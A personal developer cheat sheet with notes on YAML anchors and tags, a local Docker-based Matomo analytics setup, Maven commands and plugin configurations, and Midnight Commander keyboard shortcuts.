---
host: my_host_02
roles: *special_roles

another yaml example, anchor reference

base: &base
    name: Everyone has same name

foo: &foo
    <<: *base
    age: 10

bar: &bar
    <<: *base
    age: 20  
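
to verify how anchors and the '<<' merge key resolve, the document can be loaded with PyYAML; a minimal sketch, assuming python3 with PyYAML installed and the snippet above saved as example.yml:

python3 -c 'import yaml; print(yaml.safe_load(open("example.yml")))'
# roughly: {'base': {'name': 'Everyone has same name'}, 'foo': {'name': 'Everyone has same name', 'age': 10}, 'bar': {'name': 'Everyone has same name', 'age': 20}}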

TAG

set data type for value

  • seq
  • map
  • str
  • int
  • float
  • null
  • binary
  • omap ( Ordered map )
  • set ( unordered set )
name: Vitalii
id_1: 475123          # implicitly a number
id_2: !!str 475123    # tag placed before the value: forces a string

assign external URI to tag ( external reference )

should be defined inside metadata

%TAG ! tag:hostdata:de_muc
---
# reference id is: DE_MUC
location: !DE_MUC Cosimabad   

local tag ( reference inside document )

JSON

JSON Hyper-Schema keyword:

  • "$id"
  • "$ref"
  • "$dynamicRef"

Matomo cheat sheet

Useful links:

Alternatives

  • etracker Analytics
  • Econda ( e-commerce focused )
  • Open Web Analytics
  • Piwik Pro

Domain:

TAG <>---T----Variable
         L----Trigger(s)

Download docker-compose files

wget https://raw.githubusercontent.com/matomo-org/docker/master/.examples/apache/db.env
wget https://raw.githubusercontent.com/matomo-org/docker/master/.examples/apache/docker-compose.yml

start containers

docker-compose up

Containers start/stop

start containers

docker-compose up

stop containers

docker-compose down

remove volumes

docker volume ls
docker volume rm apache_matomo
docker volume rm apache_db

Matomo installation

  • go to installation page http://127.0.0.1:8080/

  • Database Setup:

    Password: matomo

  • Super User

    Super user login: admin
    Password: adminadmin
    Password (repeat): adminadmin
    Email: [email protected]

  • website

    Website name: localhost-matomo
    Website url: http://127.0.0.1:8080

  • for removing Warning about differences in configuration and real host running:

docker exec -it apache_app_1 /bin/bash
sed --in-place 's/\[General\]/\[General\]\nenable_trusted_host_check=0/g' /var/www/html/config/config.ini.php
  • debug messages during request:
# request to remote resource
x-www-browser http://127.0.0.1:8080/matomo.php?idsite=3&rec=1

# create property block 
sed --in-place 's/\[TagManager\]/\[TagManager\]\n\n\[Tracker\]\ndebug = 1/g' /var/www/html/config/config.ini.php

# deactivate element in the block
sed --in-place 's/debug = 1/debug = 0/g' /var/www/html/config/config.ini.php
# activate element in the block
sed --in-place 's/debug = 0/debug = 1/g' /var/www/html/config/config.ini.php

In Chrome this will not work due to the default DNT ( Do Not Track ) setting

http://127.0.0.1:8080/matomo.php?idsite=4&rec=1
# Settings->Privacy->Users opt-out->Support Do Not Track preference-> Disable ( not recommended )

need to de-activate it ( setting above )

  • additional parameters - show full stack trace
docker exec -it apache_app_1 /bin/bash
# activate
sed --in-place  "s/define('PIWIK_PRINT_ERROR_BACKTRACE', false);/define('PIWIK_PRINT_ERROR_BACKTRACE', true);/g" /var/www/html/index.php

# deactivate
sed --in-place  "s/define('PIWIK_PRINT_ERROR_BACKTRACE', true);/define('PIWIK_PRINT_ERROR_BACKTRACE', false);/g" /var/www/html/index.php
  • simple visit trace:
http://127.0.0.1:8080/matomo.php?idsite=3&rec=1

server: db
username: matomo
password: matomo
database: matomo

// scope: page: matomo_log_link_visit_action
// scope: visit: matomo_log_visit
var _paq = window._paq = window._paq || [];
_paq.push(['setCustomVariable',1,"user-id","13,14,15,16","page"]);

start apache for writing first html page with code

docker rm apache
docker run --name apache -v $(pwd):/app -p 7070:8080 bitnami/apache:latest
select * from matomo_log_visit --  contains one entry per visit (returning visitor)
select * from matomo_log_action --  contains all the type of actions possible on the website (e.g. unique URLs, page titles, download URLs…)
select * from matomo_log_link_visit_action --  contains one entry per action of a visitor (page view, …)
select * from matomo_log_conversion --  contains conversions (actions that match goals) that happen during a visit
select * from matomo_log_conversion_item --  contains e-commerce conversion items

client example ( head only )

    <head>
        <title>matomo-test</title>

        <!-- Matomo -->
        <script type="text/javascript">
            var _paq = window._paq || [];
            /* tracker methods like "setCustomDimension" should be called before "trackPageView" */
            _paq.push(["setDoNotTrack", false]);

          </script>
          <!-- End Matomo Code -->

  
        <!-- Matomo Tag Manager -->
        <script type="text/javascript">
            var _mtm = _mtm || [];
            _mtm.push({'mtm.startTime': (new Date().getTime()), 'event': 'mtm.Start'});
            var d=document, g=d.createElement('script'), s=d.getElementsByTagName('script')[0];
            g.type='text/javascript'; g.async=true; g.defer=true; g.src='http://localhost:8080/js/container_1uvttUpc.js'; s.parentNode.insertBefore(g,s);
            </script>
            <!-- End Matomo Tag Manager -->

</head>

DataLayer

var _mtm = window._mtm = window._mtm || [];
var _paq = window._paq = window._paq || [];

_paq.push(['setCustomVariable',1,"list-id","13,14,15,16","page"]);

window._mtm.push({'event': 'fire-showing-search-window'});
// select * from matomo_log_link_visit_action

// _paq.push(['trackPageView']);

Maven cheat sheet

Repositories

maven phases

( image: maven build lifecycle phases )
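
the picture is not reproduced here; as a reminder, the default build lifecycle runs its phases in a fixed order (standard Maven behaviour, not taken from the image):

# main phases of the default lifecycle, in order:
#   validate -> compile -> test -> package -> verify -> install -> deploy
mvn package   # executes every phase up to and including package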

maven scope explanations

maven scopes

create project, init project, new project

example of creating project create project empty

mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.startup.searchcorrector -DartifactId=searchcorrector -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

example of creating project create web project maven create Java web project empty web project

mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.startup.searchcorrector -DartifactId=workplace -DarchetypeArtifactId=maven-archetype-webapp -DinteractiveMode=false
mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.smava.onsite -DartifactId=soap-calculator -DarchetypeArtifactId=maven-archetype-webapp -DinteractiveMode=false

for creating Eclipse Web project ( change pom.xml:packaging to "war" ) :

mvn eclipse:eclipse -Dwtpversion=2.0

build with many threads

mvn -T 1C clean install # 1 thread per CPU core
mvn -T 4 clean install # 4 threads

build sub-modules with parent-dependencies

mvn -am ...
mvn --also-make ...

build in another folder specify project folder specify project directory

mvn -f $DIR_PROJECT/data-manager/pom.xml

list of all modules

mvn org.qunix:structure-maven-plugin:modules

build only one module, build one module, single module build

# mvn --projects common/common-utils clean install
mvn -pl common/common-utils clean install

or build with all dependencies

mvn --threads 2C --projects common/common-utils -am clean install

build without module skip module

mvn -f $DIR_PROJECT/pom.xml clean install -pl -:processing-common -Dmaven.test.skip=true -DskipTests 
mvn -f $DIR_PROJECT/pom.xml clean install -pl '-:processing-common,-:processing-e2e' -Dmaven.test.skip=true -DskipTests 
mvn clean package -pl '!:processing-common,!:processing-mapr-ojai-common'

continue to build after interruption

mvn --resume-from :processing-common install -Dmaven.test.skip=true -DskipTests 

dry run

mvn -q -Dexec.executable=echo -Dexec.args='${project.version}' --non-recursive org.codehaus.mojo:exec-maven-plugin:1.3.1:exec

for complex project print dependency tree

mvn dependency:tree | grep "^\\[INFO\\] [+\]" | awk '{print $NF}' | grep "^com.cherkashyn.vitalii" | awk -F ':' '{print $1":"$2}' > /home/projects/components.list
find . -name src | awk -F 'src' '{print $1}' | while read line; do
    echo ">>> " $line "   " `mvn -f $line"pom.xml" dependency:tree | grep "\\[INFO\\] --- maven-dependency-plugin" | awk -F '@' '{print $2}' | awk '{print $1}'`
    mvn  -f $line"pom.xml" dependency:tree | grep "^\\[INFO\\] [+-|\]" | awk '{print $NF}' | grep "^com.cherkashyn.vitalii" | awk -F ':' '{print $1":"$2}' | python python-utilities/console/string-in-list.py /home/projects/components.list
done

build only specific subproject

mvn clean install --projects :artifact_id

build test coverage

plugin:

org.scoverage:scoverage-maven-plugin:1.3.0:report
mvn scoverage:report --projects :artifact_id

single test running, start one test, certain test

https://maven.apache.org/surefire/maven-surefire-plugin/examples/single-test.html

# scala
mvn clean -Dsuites=*SpeedLimitSignalsSpec* test
mvn -Dtest=DownloadServiceImplTest* test

scalatest

mvn -Denable-scapegoat-report -Dintegration.skipTests -Dscoverage.skip -Djacoco.skip -Dsuites="*LabelerJobArgumentsTest" test 

cobertura help

mvn cobertura:help -Ddetail=true

cobertura html

mvn cobertura:clean cobertura:cobertura -Dcobertura.report.format=html

Java Vaadin project

mvn archetype:generate -DarchetypeGroupId=com.vaadin -DarchetypeArtifactId=vaadin-archetype-application -DarchetypeVersion=7.2.5 -DgroupId=com.cherkashyn.vitalii.tools.barcode.ui -DartifactId=BarCodeUtilsUI -Dversion=1.0 -Dpackaging=war

Java console application

mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.akka.web -DartifactId=akka-web -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false
 mvn archetype:generate -DgroupId=com.cherkashyn.vitalii.testtask.kaufland -DartifactId=anagrams -DarchetypeArtifactId=maven-archetype-quickstart -DinteractiveMode=false

Java OSGi bundle

mvn archetype:generate -DarchetypeGroupId=org.apache.karaf.archetypes -DarchetypeArtifactId=karaf-bundle-archetype -DarchetypeVersion=2.3.5 -DgroupId=com.cherkashyn.vitalii.osgi.test.listener -DartifactId=osgi-service-listener -Dversion=1.0.0-SNAPSHOT

Java OSGi Blueprint bundle

mvn archetype:generate -DarchetypeGroupId=org.apache.karaf.archetypes -DarchetypeArtifactId=karaf-blueprint-archetype -DarchetypeVersion=2.3.5 -DgroupId=com.cherkashyn.vitalii.osgi.test -DartifactId=osgi-blueprint-consumer -Dversion=1.0.0-SNAPSHOT

Java OSGi Karaf bundle

mvn archetype:generate -DarchetypeGroupId=org.apache.karaf.archetypes -DarchetypeArtifactId=karaf-bundle-archetype -DarchetypeVersion=2.2.8 -DgroupId=com.mycompany -DartifactId=KarafExample -Dversion=1.0-SNAPSHOT -Dpackage=com.mycompany.bundle

debug from IDE, IDE debug

-DforkCount=0 -DreuseForks=false -DforkMode=never 

remote debug, remote process debug

%MAVEN_HOME%/bin/mvnDebug

Download Sources and JavaDoc

-DdownloadSources=true -DdownloadJavadocs=true

download single artifact, download jar

mvn -DgroupId=com.oracle -DartifactId=ojdbc14 -Dversion=10.2.0.4.0 dependency:get

using another local repo

mvn clean package --batch-mode --no-transfer-progress -Dmaven.repo.local=/my/own/path/.m2/repository

install missed jar in local repo

mvn install:install-file -Dfile=jaaf-core-jee7-1.05.00.jar -DgroupId=net.ubs.security.jaaf -DartifactId=jaaf-core -Dversion=1.05.00 -Dpackaging=jar

security settings

~/.m2/settings.xml artifactory token generation

<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/SETTINGS/1.1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.1.0 http://maven.apache.org/xsd/settings-1.1.0.xsd">

    <servers>
        <server>
            <id>data-manager-releases</id>
            <username>cherkavi</username>
	    <password>eyJ2ZXIiO....</password>
        </server>
    </servers>
</settings>

exclude sub-library from dependency lib

        <dependency>
            <groupId>org.quartz-scheduler</groupId>
            <artifactId>quartz</artifactId>
            <version>2.3.0</version>
            <exclusions>
                <exclusion>
                    <groupId>com.zaxxer</groupId>
                    <artifactId>HikariCP-java6</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

describe plugin

mvn help:describe -Dplugin=org.apache.tomcat.maven:tomcat7-maven-plugin
mvn help:describe  -DgroupId=org.springframework.boot -DartifactId=spring-boot-maven-plugin -Ddetail=true

Oracle dependencies

            <dependencies>
                <dependency>
                    <groupId>com.github.noraui</groupId>
                    <artifactId>ojdbc7</artifactId>
                    <version>${oracle.driver.version}</version>
                </dependency>
            </dependencies>

Oracle driver

Class<?> driverClass = Class.forName("oracle.jdbc.driver.OracleDriver");

settings

location of settings file, maven config

mvn -X help | grep settings.xml
mvn -X | grep settings.xml

proxy settings

  • $MAVEN_HOME/conf/settings.xml
  • ${user.home}/.m2/settings.xml
<proxies>
    <proxy>
      <active>true</active>
      <protocol>http</protocol>
      <host>proxy.somewhere.com</host>
      <port>8080</port>
      <username>proxyuser</username>
      <password>somepassword</password>
      <nonProxyHosts>www.google.com|*.somewhere.com</nonProxyHosts>
    </proxy>
  </proxies>

!!! important - if your password contains symbols like $ or &, use XML escape sequences in settings.xml, e.g. &amp; instead of &

mvn compile -Dhttp.proxyHost=10.10.0.100 -Dhttp.proxyPort=8080 -Dhttp.nonProxyHosts="localhost|127.0.0.1" -Dhttp.proxyUser=baeldung -Dhttp.proxyPassword=changeme

Plugins:

release plugin

mvn -f ../pom.xml versions:set -DnewVersion=%1
mvn -f ../pom.xml -N versions:update-child-modules

javadoc

mvn javadoc:javadoc
 -Dmaven.javadoc.skip=true

jar without class, no class files

# put java files to proper place
mkdir src/main/java
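
after moving the sources, a quick way to confirm the classes really made it into the artifact (paths are illustrative):

mvn clean package
# list class files inside the produced jar
unzip -l target/*.jar | grep '\.class'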

executable jar, uber jar plugin, fat jar, jar with all dependencies, shade plugin

example of project structure ( otherwise your custom classes won't be added )

├── pom.xml
└── src
    ├── main
    │   └── java
    │       └── com
    │           └── cherkashyn
    │               └── vitalii
    │                   └── tools
    │                       ├── App.java
    │                       └── JarExtractor.java
    └── test
        └── java
            └── com
                └── cherkashyn
                    └── vitalii
                        └── tools
                            ├── AppTest.java
                            └── JarExtractorTest.java

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <packaging>jar</packaging>
    <version>1.0</version>
    <name>db-checker</name>

    <groupId>com.cherkashyn.vitalii.db</groupId>
    <artifactId>checker</artifactId>

    <dependencies>

        <!-- https://mvnrepository.com/artifact/org.postgresql/postgresql -->
        <dependency>
            <groupId>org.postgresql</groupId>
            <artifactId>postgresql</artifactId>
            <version>42.2.12</version>
        </dependency>

    </dependencies>

    <build>
        <testResources>
            <testResource>
                <directory>src/test/resources</directory>
            </testResource>
        </testResources>
        <resources>
            <resource>
                <directory>src/main/resources</directory>
            </resource>
        </resources>
        <plugins>

            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <version>3.1</version>
                <configuration>
                    <source>1.8</source>
                    <target>1.8</target>
                </configuration>
            </plugin>

            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-assembly-plugin</artifactId>
                <!-- version>2.5.4</version -->
                <configuration>
                    <descriptorRefs>
                        <descriptorRef>jar-with-dependencies</descriptorRef>
                    </descriptorRefs>
                    <archive>
                        <!-- manifestFile>${project.basedir}/src/main/resources/META-INF/MANIFEST.MF</manifestFile -->
                        <manifest>
                            <mainClass>com.cherkashyn.vitalii.db.PostgreCheck</mainClass>
                        </manifest>
                    </archive>
                    <!-- Remove the "-jar-with-dependencies" at the end of the file -->
                    <appendAssemblyId>false</appendAssemblyId>
                </configuration>
                <executions>
                    <execution>
                        <goals>
                            <goal>attached</goal>
                        </goals>
                        <phase>package</phase>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>

</project>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-compiler-plugin</artifactId>
                <configuration>
                    <source>8</source>
                    <target>8</target>
                </configuration>
            </plugin>

            <!-- Error: A JNI error has occurred, please check your installation and try again
Exception in thread "main" java.lang.SecurityException: Invalid signature file digest for Manifest main attributes -->
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-shade-plugin</artifactId>
                <version>3.1.1</version>
                <executions>
                    <execution>
                        <phase>package</phase>
                        <goals>
                            <goal>shade</goal>
                        </goals>
                        <configuration>
                            <transformers>
                                <transformer implementation="org.apache.maven.plugins.shade.resource.ManifestResourceTransformer">
                                    <mainClass>com.vodafone.SshClient</mainClass>
                                </transformer>
                            </transformers>
                            <shadedArtifactAttached>true</shadedArtifactAttached>
                            <shadedClassifierName>launcher</shadedClassifierName>
                            <!-- <minimizeJar>true</minimizeJar> -->
                            <artifactSet>
                                <excludes>
                                    <exclude>junit:junit</exclude>
                                    <exclude>jmock:*</exclude>
                                    <exclude>*:xml-apis</exclude>
                                    <exclude>org.apache.maven:lib:tests</exclude>
                                </excludes>
                            </artifactSet>
                        </configuration>
                    </execution>
                </executions>
            </plugin>

jgitflow plugin

official documentation configuration description

                <plugin>
                    <groupId>external.atlassian.jgitflow</groupId>
                    <artifactId>jgitflow-maven-plugin</artifactId>
                    <version>1.0-m5.1</version>
                    <configuration>
                        <enableSshAgent>true</enableSshAgent>
                        <autoVersionSubmodules>true</autoVersionSubmodules>
                        <allowSnapshots>true</allowSnapshots>
                        <releaseBranchVersionSuffix>RC</releaseBranchVersionSuffix>
			<developBranchName>wave3_1.1</developBranchName>
                        <pushReleases>true</pushReleases>
                        <noDeploy>true</noDeploy>
                    </configuration>
                </plugin>
mvn jgitflow:release-start
mvn jgitflow:release-finish -Dmaven.javadoc.skip=true -DskipTests=true -Dsquash=false -DpullMaster=true

if you have an issue like 'conflict with master...' - just merge master into develop

maven tomcat plugin

mvn  org.apache.tomcat.maven:tomcat7-maven-plugin:2.2:redeploy -Dmaven.test.skip -Dmaven.tomcat.url=http://host:8080/manager/text -Dtomcat.username=manager -Dtomcat.password=manager

%TOMCAT%/conf/tomcat-users.xml:

  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-jmx"/>
  <role rolename="manager-status"/>
  <role rolename="admin-gui"/>
  <role rolename="admin-script"/>
  <user username="manager" password="manager" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script"></user>

vert.x project

mvn vertx:run

            <dependency>
                <groupId>io.vertx</groupId>
                <artifactId>vertx-dependencies</artifactId>
                <version>${vertx.version}</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>

            <plugin>
                <groupId>io.fabric8</groupId>
                <artifactId>vertx-maven-plugin</artifactId>
                <version>${vertx-maven-plugin.version}</version>
                <executions>
                    <execution>
                        <id>vmp</id>
                        <goals>
                            <goal>initialize</goal>
                            <goal>package</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <redeploy>true</redeploy>
                    <jvmArgs>-Djava.net.preferIPv4Stack=true</jvmArgs>
                </configuration>
            </plugin>

spring boot project

mvn spring-boot:run

      <plugin>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-maven-plugin</artifactId>
        <version>${spring-boot.version}</version>
        <executions>
          <execution>
            <goals>
              <goal>repackage</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <jvmArguments>-Djava.net.preferIPv4Stack=true -Dserver.port=9000 -Dspring.cloud.kubernetes.enabled=false</jvmArguments>
        </configuration>
      </plugin>

fabric8 with Vert.x deployment ( Source-to-Image S2I )

fabric8 source code and examples maven fabric8 documentation

mvn fabric8:deploy
mvn fabric8:undeploy

            <plugin>
                <groupId>io.fabric8</groupId>
                <artifactId>fabric8-maven-plugin</artifactId>
                <version>${fabric8.maven.plugin.version}</version>
                <executions>
                    <execution>
                        <goals>
                            <goal>resource</goal>
                            <goal>build</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <resources>
                        <labels>
                            <all>
                                <property>
                                    <name>app</name>
                                    <value>{app-name}</value>
                                </property>
                            </all>
                        </labels>
                    </resources>
                    <enricher>
                        <excludes>
                            <exclude>vertx-health-check</exclude>
                        </excludes>
                    </enricher>
                    <generator>
                        <includes>
                            <include>vertx</include>
                        </includes>
                        <config>
                            <vertx>
                                <from>registry.access.redhat.com/redhat-openjdk-18/openjdk18-openshift:1.1</from>
                            </vertx>
                        </config>
                    </generator>
                </configuration>
            </plugin>

fabric8 with SpringBoot deployment ( Source-to-Image S2I )

mvn fabric8:deploy
mvn fabric8:undeploy

      <plugin>
        <groupId>io.fabric8</groupId>
        <artifactId>fabric8-maven-plugin</artifactId>
        <version>${fabric8.maven.plugin.version}</version>
        <executions>
          <execution>
            <goals>
              <goal>resource</goal>
              <goal>build</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <resources>
              <labels>
                  <all>
                      <property>
                          <name>app</name>
                          <value>{app-name}</value>
                      </property>
                  </all>
              </labels>
          </resources>
          <enricher>
            <excludes>
              <exclude>spring-boot-health-check</exclude>
            </excludes>
          </enricher>
          <generator>
            <includes>
              <include>spring-boot</include>
            </includes>
            <config>
              <spring-boot>
                <from>registry.access.redhat.com/redhat-openjdk-18/openjdk18-openshift:1.1</from>
              </spring-boot>
            </config>
          </generator>
        </configuration>
      </plugin>

wildfly project

mvn wildfly-swarm:run

      <plugin>
        <groupId>org.wildfly.swarm</groupId>
        <artifactId>wildfly-swarm-plugin</artifactId>
        <version>${version.wildfly.swarm}</version>
        <executions>
          <execution>
            <goals>
              <goal>package</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <properties>
            <java.net.preferIPv4Stack>true</java.net.preferIPv4Stack>
          </properties>
          <jvmArguments>-Dswarm.http.port=9001</jvmArguments>
        </configuration>
      </plugin>

fabric8 with WildFly, openshift with WildFly, WildFly Swarm ( Source-to-Image S2I )

mvn fabric8:deploy
mvn fabric8:undeploy

      <plugin>
        <groupId>io.fabric8</groupId>
        <artifactId>fabric8-maven-plugin</artifactId>
        <version>${fabric8.maven.plugin.version}</version>
        <executions>
          <execution>
            <goals>
              <goal>resource</goal>
              <goal>build</goal>
            </goals>
          </execution>
        </executions>
        <configuration>
          <resources>
              <labels>
                  <all>
                      <property>
                          <name>app</name>
                          <value>my-app</value>
                      </property>
                  </all>
              </labels>
          </resources>
          <generator>
            <includes>
              <include>wildfly-swarm</include>
            </includes>
            <config>
              <wildfly-swarm>
                <from>registry.access.redhat.com/redhat-openjdk-18/openjdk18-openshift:1.1</from>
              </wildfly-swarm>
            </config>
          </generator>
          <enricher>
            <excludes>
              <exclude>wildfly-swarm-health-check</exclude>
            </excludes>
          </enricher>
        </configuration>
      </plugin>

set version of source code

      <build>
		<plugins>
			<plugin>
			<groupId>org.apache.maven.plugins</groupId>
			<artifactId>maven-compiler-plugin</artifactId>
			<version>3.1</version>
			<configuration>
				<source>1.6</source>
				<target>1.6</target>
			</configuration>
			</plugin>
		</plugins>
	</build>

maven war plugin

    <plugin>
        <artifactId>maven-war-plugin</artifactId>
        <version>3.1.0</version>
        <configuration>
          <failOnMissingWebXml>false</failOnMissingWebXml>
        </configuration>
      </plugin>

maven exec plugin

mvn exec:java

    <build>
        <plugins>
          <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.4.0</version>
            <executions>
              <execution>
                <goals>
                  <goal>java</goal>
                </goals>
              </execution>
            </executions>
            <configuration>
              <mainClass>org.cherkashyn.vitalii.test.App</mainClass>
              <arguments>
                <argument>argument1</argument>
              </arguments>
              <systemProperties>
                <systemProperty>
                  <key>myproperty</key>
                  <value>myvalue</value>
                </systemProperty>
              </systemProperties>
            </configuration>
          </plugin>
        </plugins>
      </build>

copy into package additional resources

    <resources>
      <resource>
        <directory>src/main/java</directory>
        <includes>
          <include> **/*.java </include>
          <include> **/*.properties </include>
          <include> **/*.xml </include>
        </includes>
      </resource>
      <resource>
        <directory>src/test/java</directory>
        <includes>
          <include> **/*.java </include>
          <include> **/*.properties </include>
          <include> **/*.xml </include>
        </includes>
      </resource>
    </resources>

sonar plugin

%Maven%/conf/settings.xml

		<profile>
			<id>sonar</id>
			<activation>
				<activeByDefault>true</activeByDefault>
			</activation>
			<properties>
				<sonar.jdbc.url>
				  jdbc:mysql://localhost:3306/sonar_schema?useUnicode=true&amp;characterEncoding=utf8
				</sonar.jdbc.url>
				<sonar.jdbc.driverClassName>com.mysql.jdbc.Driver</sonar.jdbc.driverClassName>
				<sonar.jdbc.username>root</sonar.jdbc.username>
				<sonar.jdbc.password></sonar.jdbc.password>

				<sonar.host.url>
				  http://localhost:9000
				</sonar.host.url>
			</properties>
		</profile>
mvn sonar:sonar

docker plugin

    <build>
        <plugins>
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <executions>
                    <!-- override build docker image with additional arguments -->
                    <execution>
                        <id>docker-build</id>
                        <configuration>
                            <environmentVariables>
                                <DOCKER_BUILDKIT>${enable-docker-build-kit}</DOCKER_BUILDKIT>
                            </environmentVariables>
                            <arguments combine.children="append">
                                <argument>--secret</argument>
                                <argument>id=netrc,src=${netrc-path}</argument>
                            </arguments>
                        </configuration>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>
# Dockerfile should exist alongside pom.xml
mvn verify -Denable-docker-build

smallest pom.xml, init pom.xml, start pom.xml

<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <packaging>jar</packaging>
  <version>1.0-SNAPSHOT</version>
  <name>workplace</name>
  <url>http://maven.apache.org</url>
  
  <groupId>com.cherkashyn.vitalii.startup.searchcorrector</groupId>
  <artifactId>workplace</artifactId>
	
  <dependencies>
    <dependency>
      <groupId>junit</groupId>
      <artifactId>junit</artifactId>
      <version>3.8.1</version>
      <scope>test</scope>
    </dependency>
  </dependencies>
</project>
            <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <configuration>
                    <classpathDependencyExcludes>
                        <classpathDependencyExclude>org.apache.logging.log4j:log4j-slf4j-impl</classpathDependencyExclude>
                    </classpathDependencyExcludes>
                </configuration>
            </plugin>
     <plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-failsafe-plugin</artifactId>
                <configuration>
                    <classpathDependencyExcludes>
                        <classpathDependencyExclude>org.apache.logging.log4j:log4j-slf4j-impl</classpathDependencyExclude>
                    </classpathDependencyExcludes>
                </configuration>
            </plugin>
<?xml version="1.0" encoding="UTF8"?>
<toolchains>
    <toolchain>
        <type>jdk</type>
        <provides>
            <id>jdk8</id>
            <version>8</version>
            <vendor>openjdk</vendor>
        </provides>
        <configuration>
            <jdkHome>/path/to/jdk8</jdkHome>
        </configuration>
    </toolchain>
    <toolchain>
        <type>jdk</type>
        <provides>
            <id>jdk13</id>
            <version>13</version>
            <vendor>openjdk</vendor>
        </provides>
        <configuration>
            <jdkHome>/path/to/jdk13</jdkHome>
        </configuration>
    </toolchain>
</toolchains>
<properties>
  <jdk.version>8</jdk.version>
</properties>
<plugin>
    <groupId>org.apache.maven.plugins</groupId>
    <artifactId>maven-toolchains-plugin</artifactId>
    <version>${maven-toolchains-plugin.version}</version>
    <executions>
        <execution>
            <goals>
                <goal>toolchain</goal>
            </goals>
        </execution>
    </executions>
    <configuration>
        <toolchains>
            <jdk>
                <version>${jdk.version}</version>
            </jdk>
        </toolchains>
    </configuration>
</plugin>
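
by default the toolchains file above is read from ~/.m2/toolchains.xml; an alternative location can be passed explicitly (a sketch, path is a placeholder):

# use the default location
mvn clean install
# or point maven at a specific toolchains file
mvn --toolchains /path/to/toolchains.xml clean install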

Archetypes

The desired archetype does not exist

# https://repository.apache.org/content/groups/snapshots-group/org/apache/camel/archetypes/3.4.0-SNAPSHOT/maven-metadata.xml
#   -DarchetypePackaging=pom \
#   -Dpackaging=pom \
mvn archetype:generate\
  -X \
  -DarchetypeGroupId=org.apache.camel \
  -DarchetypeVersion=3.4.0-SNAPSHOT \
  -DarchetypeArtifactId=archetypes \
  -DarchetypeRepository=https://repository.apache.org/content/groups/snapshots-group | grep resolution

# or original 
mvn archetype:generate \
  -DarchetypeGroupId=org.apache.camel.archetypes \
  -DarchetypeArtifactId=camel-archetype-java \
  -DarchetypeVersion=3.4.0-SNAPSHOT \
  -DarchetypeRepository=https://repository.apache.org/content/groups/snapshots-group
vim $HOME/.m2/repository/archetype-catalog.xml
# https://maven.apache.org/archetype/archetype-models/archetype-catalog/archetype-catalog.html
<?xml version="1.0" encoding="UTF-8"?>
<archetype-catalog  xmlns="http://maven.apache.org/plugins/maven-archetype-plugin/archetype-catalog/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/plugins/maven-archetype-plugin/archetype-catalog/1.0.0 http://maven.apache.org/xsd/archetype-catalog-1.0.0.xsd">
  <archetypes>
    <archetype>
        <groupId>org.apache.camel</groupId>
        <artifactId>archetypes</artifactId>
        <version>3.4.0-SNAPSHOT</version>
        <repository>https://repository.apache.org/content/groups/snapshots-group</repository>
        <description>Apache camel archetype</description>
    </archetype>
  </archetypes>
</archetype-catalog>

find all plugins in project, search for all plugings in project

for each_file in `find . -name pom.xml | grep -v target`; do
    # cat $each_file | grep plugins
    AMOUNT_OF_PLUGINS=`cat $each_file | xpath -e "/project/build/plugins/plugin/artifactId | /project/profiles/profile/build/plugins/plugin/artifactId" 2>/dev/null | wc -l`
    if [[ $AMOUNT_OF_PLUGINS -gt 0 ]]; then
        echo "---"
        echo $each_file"  "$AMOUNT_OF_PLUGINS 
        cat $each_file | xpath -e "/project/build/plugins/plugin/artifactId | /project/profiles/profile/build/plugins/plugin/artifactId" 2>/dev/null | grep -v "^-- NODE"
    fi
done
# cat out.txt | grep -v "\-\-\-" | grep -v "pom.xml" | sort | uniq

Midnight Commander shortcuts cheat sheet

Shortcut Description
Ctrl-x i show panel Information
Ctrl-x q show panel Quick view
Ctrl-x ! show custom command result
Ctrl-Space calculate folder size
Ctrl-x t copy selected files into console
Ctrl-x d compare Directories
Ctrl-x h add to Hotlist current directory
Ctrl-x q show HEX of file
Ctrl-x c Chmod dialog
Ctrl-x o chOwn dialog
Ctrl-x s create Symlink dialog
Ctrl-x l create hard Link dialog
Alt-. Toggle "Show Hidden Files" feature
Alt-t Toggle "change panel view"
Alt-h Show command history
Alt-p Previous command in the history
